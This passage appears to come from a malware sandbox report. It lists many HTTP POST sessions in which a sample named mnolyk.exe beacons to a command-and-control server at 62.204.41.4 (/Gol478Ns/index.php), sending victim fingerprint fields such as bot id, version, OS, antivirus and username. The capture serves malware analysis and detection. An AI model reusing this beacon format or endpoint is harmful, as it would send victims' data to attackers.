                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:06.557442904 CET935INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      476192.168.2.75020462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:06.733576059 CET936OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:06.797574997 CET936INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      477192.168.2.75020562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:07.442403078 CET937OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:07.509082079 CET937INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      478192.168.2.75020662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:07.828165054 CET938OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:07.892654896 CET938INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      479192.168.2.75020762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:08.630703926 CET939OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:08.697093964 CET939INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      48192.168.2.74977262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:09.270270109 CET480OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.336646080 CET480INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      480192.168.2.75020862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:09.067569017 CET940OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.133527994 CET940INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      481192.168.2.75020962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:09.315254927 CET941OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.380939960 CET941INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      482192.168.2.75021062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:09.556488037 CET942OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.621283054 CET942INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      483192.168.2.75021162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:09.797467947 CET943OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.862864971 CET943INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      484192.168.2.75021262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:10.033407927 CET944OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.100136042 CET944INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      485192.168.2.75021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:10.266407967 CET945OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.331212997 CET945INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      486192.168.2.75021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:10.502845049 CET946OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.566845894 CET946INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      487192.168.2.75021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:10.750044107 CET947OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.813678980 CET947INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      488192.168.2.75021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:10.984164953 CET948OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.049561977 CET948INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      489192.168.2.75021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:11.221533060 CET949OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.286397934 CET949INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      49192.168.2.74977362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:09.507797956 CET481OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.572981119 CET481INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      490192.168.2.75021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:11.455699921 CET950OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.520849943 CET950INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      491192.168.2.75021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:11.691916943 CET951OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:11.757682085 CET951INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      492192.168.2.75022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:11.948249102 CET952OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:12.012115955 CET952INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
